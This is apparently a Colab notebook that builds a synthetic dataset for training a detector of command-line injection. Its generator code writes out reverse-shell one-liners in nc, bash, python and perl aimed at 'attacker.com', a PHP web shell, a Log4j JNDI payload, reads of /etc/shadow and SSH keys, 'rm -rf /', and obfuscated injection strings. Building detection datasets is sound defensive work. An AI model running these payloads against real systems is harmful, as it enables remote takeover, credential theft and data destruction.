<a href="https://colab.research.google.com/github/psheetalreddy/NLP-Based-Command-Injection-Detection/blob/main/Command_Line_Injection_Dataset_Creation.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# **Command Line Injection Detection - Dataset Creation**

### **Overall Goal:**
This notebook is designed to create a synthetic dataset for training a machine learning model to detect Command Line Injection (CLI) attacks. It systematically generates a diverse set of benign (safe) and malicious (attack) command-line inputs, including various obfuscation techniques and edge cases, to build a robust detection model.

## **Section 1 : Dataset Generation Logic**
This comprehensive code cell contains all the necessary functions and logic to generate a rich dataset of benign and malicious command-line inputs. It's structured into several key parts:

*   **Imports:** Essential libraries for data manipulation, randomization, and encoding.
*   **Benign Samples Generation:** Defines legitimate patterns and functions to create variations of safe user inputs.
*   **Malicious Samples Generation:** Defines various attack components (shells, commands, sensitive files, delimiters) and functions to create diverse and obfuscated malicious inputs.
*   **Edge Cases:** Special scenarios that blur the line between benign and malicious, challenging the detection model.
*   **Main Generation Function (`generate_dataset`):** Orchestrates the creation, labeling, shuffling, and saving of the complete dataset.

#### **Sub-section 1.1: Library Imports**
This block imports standard Python libraries required for data generation:

*   `json`: For handling JSON data, specifically for saving the dataset in JSON Lines format.
*   `random`: For generating random choices and variations in samples.
*   `urllib.parse`: For URL encoding, a common obfuscation technique.
*   `base64`: For Base64 encoding, another obfuscation method.
*   `string`: Though not directly used in the current version, it's often useful for string manipulations.
*   `itertools.product`: Used to generate Cartesian products, useful for combining different elements.

#### **Sub-section 1.2: Benign Samples Definition and Generation**
This part focuses on defining and generating legitimate command-line inputs or user queries. These samples represent normal, non-malicious system interactions or user behaviors.

*   **`BENIGN_PATTERNS`:** A list of predefined, legitimate strings that might contain characters often associated with attacks (e.g., `;`, `&`, `|`, `<`, `>`), but are used in a harmless context.
*   **`generate_benign_samples(count)` function:** This function expands on the `BENIGN_PATTERNS` by generating additional legitimate variations, including URLs, file paths, general search queries, and natural language questions, ensuring a diverse set of safe inputs.

#### **Sub-section 1.3: Malicious Samples Definition and Obfuscation Techniques**
This section is crucial for simulating various command injection attacks. It defines core components of attacks and methods to make them harder to detect.

*   **`SHELLS`, `COMMANDS`, `SENSITIVE_FILES`, `DELIMITERS`:** These lists provide the building blocks for malicious payloads, mimicking common shell environments, attack commands, target files, and command separation characters.
*   **Obfuscation Functions (`url_encode`, `double_url_encode`, `hex_encode`, `base64_encode`, `case_variation`, `add_noise`):** These functions implement techniques attackers use to hide their malicious intent. They transform commands to bypass simple string matching, making detection more challenging for a model.

#### **Sub-section 1.4: Malicious Sample Generation Functions**
This part provides specific functions to construct different types of command injection attacks, combining the malicious components and obfuscation techniques.

*   **`generate_basic_injection`:** Creates simple injections by appending a command after a benign-looking prefix using a delimiter.
*   **`generate_chained_commands`:** Simulates execution of multiple commands sequentially or conditionally.
*   **`generate_file_access`:** Focuses on attempts to read sensitive system files.
*   **`generate_pipe_injection`:** Uses pipes (`|`) to chain commands, often for data exfiltration or processing.
*   **`generate_redirection`:** Injects commands that redirect output to a file, potentially creating backdoors or web shells.
*   **`generate_reverse_shell`:** Generates common reverse shell payloads to gain remote access.
*   **`generate_code_execution`:** Creates payloads for direct code execution, often seen in web application vulnerabilities.
*   **`generate_time_based`:** Simulates blind injection attacks that rely on time delays to infer information.
*   **`generate_obfuscated_injection`:** Applies various advanced obfuscation methods to common commands to evade detection.

*   **`generate_malicious_samples(count)` function:** This orchestrates the creation of a diverse set of malicious samples by randomly selecting and applying different attack patterns and obfuscation techniques.

#### **Sub-section 1.5: Edge Cases Definition and Generation**
Edge cases are critical for training a robust model as they represent inputs that are ambiguous or intentionally deceptive. They challenge the model to distinguish subtle differences.

*   **`generate_edge_cases()` function:** This function defines a small set of hand-crafted examples:
    *   Benign inputs that *look* suspicious (e.g., SQL-like queries, benign commands in strings).
    *   Malicious inputs that *look* benign (e.g., commands hidden within an IP address or filename).
    *   Examples using Unicode, URL encoding, hex encoding, null bytes, and CRLF (carriage return/line feed) characters to bypass detection or manipulate parsing.

#### **Sub-section 1.6: Main Dataset Generation and Output**
This is the core function that combines all the generated samples into a single dataset and saves it in a usable format.

*   **`generate_dataset(benign_count, malicious_count, output_file)` function:**
    *   Calls `generate_benign_samples`, `generate_malicious_samples`, and `generate_edge_cases` to get all the data.
    *   Assigns labels (0 for benign, 1 for malicious) and categories (`benign`, `malicious`, `edge_case`) to each sample.
    *   Combines and shuffles the entire dataset to ensure randomness.
    *   Saves the dataset to a specified `output_file` in `JSON Lines (.jsonl)` format, which is convenient for machine learning tasks as each line is a self-contained JSON object.
    *   Prints a summary of the generated dataset.

#### **Sub-section 1.7: Execution Block**
This `if __name__ == "__main__":` block ensures that the code inside it only runs when the script is executed directly (not when imported as a module).

*   It calls `generate_dataset` with specified counts for benign and malicious samples, creating a large and balanced dataset (`20,000+` samples).
*   It then prints a few sample benign and malicious inputs from the generated dataset, allowing for a quick visual inspection of the data's characteristics and to confirm the generation process was successful.

In [None]:
import json
import random
import urllib.parse
import base64
import string
from itertools import product

# ============ BENIGN SAMPLES ============

# Legitimate user inputs that might contain suspicious characters
BENIGN_PATTERNS = [
    # Network-related legitimate queries
    "ping google.com",
    "traceroute 8.8.8.8",
    "nslookup example.com",
    "telnet localhost 8080",

    # File operations (legitimate context)
    "search for file.txt in documents",
    "find all .pdf files",
    "list directory contents",
    "show file properties",

    # Search queries with special characters
    "search for books > 200 pages",
    "products priced < $50",
    "items rated 4 & 5 stars",
    "AT&T customer service",
    "Rock & Roll music",
    "cats && dogs comparison",

    # Technical documentation
    "The command is `ls -la`",
    "Use syntax: echo $variable",
    "Example: cat file.txt | grep pattern",
    "Run: python script.py --help",

    # Natural language with punctuation
    "hello; how are you?",
    "yes; I agree completely",
    "price: $19.99; quantity: 5",
    "name: John; age: 30",

    # IP addresses and domains
    "127.0.0.1",
    "192.168.1.1",
    "10.0.0.1",
    "google.com",
    "api.example.com/v1/users",

    # Email and usernames
    "user@domain.com",
    "admin@localhost",
    "john.doe@company.net",
    "test_user_123",

    # Programming-related
    "array[0]",
    "dict['key']",
    "function(param1, param2)",
    "if (x > 0) return true",

    # Legitimate system queries
    "what is my IP address?",
    "check system time",
    "show network status",
    "display current user",
    "get environment variables",

    # Common phrases
    "copy & paste instructions",
    "download | install | configure",
    "save > export > share",
    "read || write || execute",
]

# Generate variations of benign samples
def generate_benign_samples(count=5000):
    samples = []

    # Add base patterns
    samples.extend(BENIGN_PATTERNS * (count // len(BENIGN_PATTERNS)))

    # Generate legitimate URLs
    for _ in range(count // 10):
        domain = random.choice(['google.com', 'example.com', 'api.service.com', 'localhost'])
        port = random.choice(['', ':8080', ':443', ':3000'])
        path = '/' + '/'.join(random.choices(['api', 'v1', 'users', 'products', 'search'], k=random.randint(1, 3)))
        param = '?id=' + str(random.randint(1, 10000))
        samples.append(f"{domain}{port}{path}{param}")

    # Generate legitimate file paths
    for _ in range(count // 10):
        path = '/'.join(random.choices(['home', 'user', 'documents', 'projects', 'data'], k=random.randint(2, 4)))
        filename = random.choice(['report.pdf', 'data.csv', 'config.json', 'readme.md'])
        samples.append(f"/{path}/{filename}")

    # Generate search queries
    search_terms = ['python tutorial', 'best practices', 'how to cook', 'weather forecast',
                   'movie reviews', 'product comparison', 'travel destinations']
    for _ in range(count // 10):
        query = random.choice(search_terms)
        samples.append(f"search: {query}")

    # Generate natural language questions
    questions = [
        "What is the weather today?",
        "How do I reset my password?",
        "Where can I find the documentation?",
        "Can you help me with this error?",
        "What time does the store close?",
    ]
    samples.extend(questions * (count // 50))

    return samples[:count]


# ============ MALICIOUS SAMPLES ============

SHELLS = ['sh', 'bash', 'zsh', 'cmd', 'powershell', 'python', 'perl', 'ruby']
COMMANDS = [
    'ls', 'cat', 'whoami', 'id', 'pwd', 'uname', 'hostname',
    'ps', 'netstat', 'ifconfig', 'wget', 'curl', 'nc', 'telnet',
    'rm', 'chmod', 'chown', 'kill', 'pkill', 'shutdown', 'reboot',
    'useradd', 'passwd', 'su', 'sudo', 'crontab', 'systemctl'
]
SENSITIVE_FILES = [
    '/etc/passwd', '/etc/shadow', '/etc/hosts', '/root/.ssh/id_rsa',
    'c:\\windows\\system32\\config\\sam', '/proc/self/environ',
    '/var/log/apache2/access.log', '~/.bash_history'
]
DELIMITERS = [';', '&&', '||', '|', '\n', '`', '$()']

# Obfuscation techniques
def url_encode(s):
    return urllib.parse.quote(s)

def double_url_encode(s):
    return urllib.parse.quote(urllib.parse.quote(s))

def hex_encode(s):
    return ''.join([f'\\x{ord(c):02x}' for c in s])

def base64_encode(s):
    return base64.b64encode(s.encode()).decode()

def case_variation(s):
    """Random case mixing like CaT or WhOaMi"""
    return ''.join(random.choice([c.upper(), c.lower()]) if c.isalpha() else c for c in s)

def add_noise(s):
    """Add whitespace or comments to obfuscate"""
    noise_patterns = [
        lambda x: x.replace(' ', '  '),  # Extra spaces
        lambda x: x.replace(' ', '\t'),  # Tabs
        lambda x: x + ' # comment',       # Comments
        lambda x: f"$(echo {x})",         # Command substitution
    ]
    return random.choice(noise_patterns)(s)


def generate_basic_injection(cmd, delimiter):
    """Basic command injection"""
    prefix = random.choice(['127.0.0.1', 'google.com', 'test', 'user_input', ''])
    return f"{prefix}{delimiter} {cmd}"

def generate_chained_commands():
    """Multiple commands chained"""
    cmd1 = random.choice(COMMANDS[:7])  # Less destructive commands
    cmd2 = random.choice(COMMANDS[:10])
    delimiter = random.choice([';', '&&', '||'])
    return f"{cmd1} {delimiter} {cmd2}"

def generate_file_access():
    """Accessing sensitive files"""
    file = random.choice(SENSITIVE_FILES)
    cmd = random.choice(['cat', 'head', 'tail', 'less', 'more'])
    return f"{cmd} {file}"

def generate_pipe_injection():
    """Pipe-based injection"""
    cmd1 = random.choice(['cat', 'echo', 'printf', 'ls'])
    cmd2 = random.choice(['grep', 'awk', 'sed', 'cut', 'base64'])
    file = random.choice(SENSITIVE_FILES)
    return f"{cmd1} {file} | {cmd2}"

def generate_redirection():
    """Output redirection attacks"""
    cmd = random.choice(COMMANDS)
    target = random.choice(['/tmp/backdoor', '/var/www/shell.php', './exploit.sh'])
    return f"{cmd} > {target}"

def generate_reverse_shell():
    """Reverse shell payloads"""
    patterns = [
        f"nc -e /bin/sh attacker.com {random.randint(1000, 9999)}",
        f"bash -i >& /dev/tcp/attacker.com/{random.randint(1000, 9999)} 0>&1",
        f"python -c 'import socket,os,pty;s=socket.socket();s.connect((\"attacker.com\",{random.randint(1000, 9999)}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/sh\")'",
        f"perl -e 'use Socket;$i=\"attacker.com\";$p={random.randint(1000, 9999)};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");}};'"
    ]
    return random.choice(patterns)

def generate_code_execution():
    """Code execution payloads"""
    patterns = [
        f"eval({random.choice(['`whoami`', '$(cat /etc/passwd)', '$_GET[cmd]'])})",
        f"exec({random.choice(['ls', 'cat /etc/shadow', 'wget backdoor.sh'])})",
        f"system({random.choice(['id', 'uname -a', 'ps aux'])})",
        "<?php system($_GET['cmd']); ?>",
        "${jndi:ldap://attacker.com/exploit}",  # Log4j style
    ]
    return random.choice(patterns)

def generate_time_based():
    """Time-based blind injection"""
    patterns = [
        f"; sleep {random.randint(1, 10)}",
        f"&& timeout {random.randint(1, 10)}",
        "; ping -c 10 127.0.0.1",
    ]
    return random.choice(patterns)

def generate_obfuscated_injection():
    """Heavily obfuscated injections"""
    cmd = random.choice(COMMANDS[:10])
    techniques = [
        lambda c: f"${{IFS}}{c}",  # Using IFS
        lambda c: f"c''a''t /etc/passwd",  # Empty quotes
        lambda c: f"wh\\o\\am\\i",  # Backslash escaping
        lambda c: f"$(printf 'whoami')",  # printf encoding
        lambda c: f"`echo {base64_encode(c)} | base64 -d`",  # Base64
        lambda c: url_encode(c),  # URL encoding
        lambda c: case_variation(c),  # Case variation
    ]
    return random.choice(techniques)(cmd)


def generate_malicious_samples(count=5000):
    """Generate diverse malicious samples"""
    samples = []
    generators = [
        lambda: generate_basic_injection(random.choice(COMMANDS), random.choice(DELIMITERS)),
        generate_chained_commands,
        generate_file_access,
        generate_pipe_injection,
        generate_redirection,
        generate_reverse_shell,
        generate_code_execution,
        generate_time_based,
        generate_obfuscated_injection,
    ]

    for _ in range(count):
        generator = random.choice(generators)
        sample = generator()

        # Apply additional obfuscation randomly
        if random.random() < 0.3:
            obfuscation = random.choice([url_encode, case_variation, add_noise])
            try:
                sample = obfuscation(sample)
            except:
                pass  # If obfuscation fails, use original

        samples.append(sample)

    return samples


# ============ EDGE CASES ============

def generate_edge_cases():
    """Generate challenging edge cases"""
    return [
        # Benign that look suspicious
        "SELECT * FROM users WHERE id=1",  # SQL-like but not injection
        "echo 'Hello World'",  # Benign command in string
        "test && echo success",  # Logical operators in benign context
        "path/to/file | wc -l",  # Pipe symbol in documentation

        # Malicious that look benign
        "127.0.0.1 && whoami",  # IP with command
        "google.com; cat /etc/passwd",  # Domain with command
        "user@example.com`id`",  # Email with backticks
        "filename.txt;rm -rf /",  # Filename with command

        # Unicode and encoding tricks
        "wh\u006fami",  # Unicode escape
        "%77%68%6f%61%6d%69",  # URL encoded whoami
        "\\x77\\x68\\x6f\\x61\\x6d\\x69",  # Hex encoded whoami

        # Null bytes and special characters
        "cat /etc/passwd%00.jpg",  # Null byte
        "cmd\r\nwhoami",  # CRLF injection

        # Context-dependent
        "filename.pdf;whoami;.jpg",  # Hidden in filename
        "' OR '1'='1; exec master..xp_cmdshell 'dir'--",  # SQLi + Command injection
    ]


# ============ MAIN GENERATION ============

def generate_dataset(benign_count=10000, malicious_count=10000, output_file="advanced_dataset.jsonl"):
    """Generate complete dataset"""

    print(f"Generating {benign_count} benign samples...")
    benign_samples = generate_benign_samples(benign_count)

    print(f"Generating {malicious_count} malicious samples...")
    malicious_samples = generate_malicious_samples(malicious_count)

    print("Adding edge cases...")
    edge_cases = generate_edge_cases()

    # Create dataset
    dataset = []

    # Add benign samples
    for sample in benign_samples:
        dataset.append({
            "input_string": sample,
            "label": 0,
            "category": "benign"
        })

    # Add malicious samples
    for sample in malicious_samples:
        dataset.append({
            "input_string": sample,
            "label": 1,
            "category": "malicious"
        })

    # Add edge cases (manually labeled)
    edge_labels = [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]  # Based on edge_cases order
    for sample, label in zip(edge_cases, edge_labels):
        dataset.append({
            "input_string": sample,
            "label": label,
            "category": "edge_case"
        })

    # Shuffle dataset
    random.shuffle(dataset)

    # Save to file
    print(f"Saving dataset to {output_file}...")
    with open(output_file, 'w') as f:
        for item in dataset:
            f.write(json.dumps(item) + '\n')

    print(f"✅ Dataset generated successfully!")
    print(f"Total samples: {len(dataset)}")
    print(f"  - Benign: {benign_count}")
    print(f"  - Malicious: {malicious_count}")
    print(f"  - Edge cases: {len(edge_cases)}")

    return dataset


if __name__ == "__main__":
    # Generate dataset
    dataset = generate_dataset(
        benign_count=10000,
        malicious_count=10000,
        output_file="advanced_command_injection_dataset.jsonl"
    )

    # Print some samples
    print("\n" + "="*50)
    print("Sample Benign Inputs:")
    print("="*50)
    benign_samples = [d for d in dataset if d['label'] == 0][:5]
    for i, sample in enumerate(benign_samples, 1):
        print(f"{i}. {sample['input_string']}")

    print("\n" + "="*50)
    print("Sample Malicious Inputs:")
    print("="*50)
    malicious_samples = [d for d in dataset if d['label'] == 1][:5]
    for i, sample in enumerate(malicious_samples, 1):
        print(f"{i}. {sample['input_string']}")

Generating 10000 benign samples...
Generating 10000 malicious samples...
Adding edge cases...
Saving dataset to advanced_command_injection_dataset.jsonl...
✅ Dataset generated successfully!
Total samples: 20014
  - Benign: 10000
  - Malicious: 10000
  - Edge cases: 15

Sample Benign Inputs:
1. what is my IP address?
2. google.com
3. check system time
4. AT&T customer service
5. read || write || execute

Sample Malicious Inputs:
1. NETsTaT
2. $(echo less /var/log/apache2/access.log)
3. netstat	>	/tmp/backdoor
4. ${IFS}pwd
5. && timeout 1


In [2]:
!git clone https://github.com/psheetalreddy/NLP-Based-Command-Injection-Detection.git

Cloning into 'NLP-Based-Command-Injection-Detection'...
remote: Enumerating objects: 6, done.[K
remote: Counting objects: 100% (6/6), done.[K
remote: Compressing objects: 100% (4/4), done.[K
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)[K
Receiving objects: 100% (6/6), done.


In [5]:
!git add Command Line Injection-Dataset_Creation.ipynb

fatal: not a git repository (or any of the parent directories): .git


In [4]:
!%cd /content/NLP-Based-Command-Injection-Detection

/bin/bash: line 1: fg: no job control


In [6]:
!ls -a

.  ..  .config	NLP-Based-Command-Injection-Detection  sample_data


In [7]:
!git status

fatal: not a git repository (or any of the parent directories): .git


In [9]:
!cp /path/to/your_notebook.ipynb

cp: missing destination file operand after '/path/to/your_notebook.ipynb'
Try 'cp --help' for more information.
